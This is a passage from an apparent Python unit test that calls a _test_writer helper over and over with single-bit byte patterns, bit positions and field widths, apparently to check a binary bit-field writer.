_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 31, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 30, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 29, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 28, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 27, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 26, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 25, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 24, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 23, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 22, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 21, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 20, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 19, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 18, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 17, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 32, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 31, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 30, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 29, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 28, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 27, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 26, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 25, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 24, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 23, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 22, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 21, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 20, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 19, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 18, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 17, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 16, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 15, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 14, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 13, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 12, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 11, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 10, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 9, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 8, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 7, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 6, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 5, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 4, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 3, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 2, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 1, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 32, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 31, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 30, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 29, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 28, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 27, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 26, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 25, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 24, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 23, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 22, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 21, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 20, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 19, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 18, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 17, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 16, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 15, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 14, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 13, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 12, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 11, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 10, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 9, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 8, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 7, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 6, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 5, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 4, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 3, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 2, False, 1)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 5, 1, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 32, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 31, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 30, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 29, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 28, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 27, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 26, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 25, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 24, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 23, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 22, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 21, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 20, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 19, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 18, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 17, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 16, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 15, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 14, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 13, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 12, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 11, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 10, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 9, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 8, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 7, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 6, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 5, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 4, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 3, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 2, False, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 4, 1, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 32, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 31, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 30, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 29, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 28, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 27, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 26, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 25, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 24, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 23, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 22, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 21, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 20, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 19, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 18, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 17, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 15, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 14, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 13, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 12, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 11, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 10, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 9, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 8, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 7, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 6, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 5, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 4, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 3, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, False, 1)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 1, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 32, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 31, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 30, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 29, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 28, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 27, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 26, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 25, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 24, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 23, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 22, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 21, False, 1)
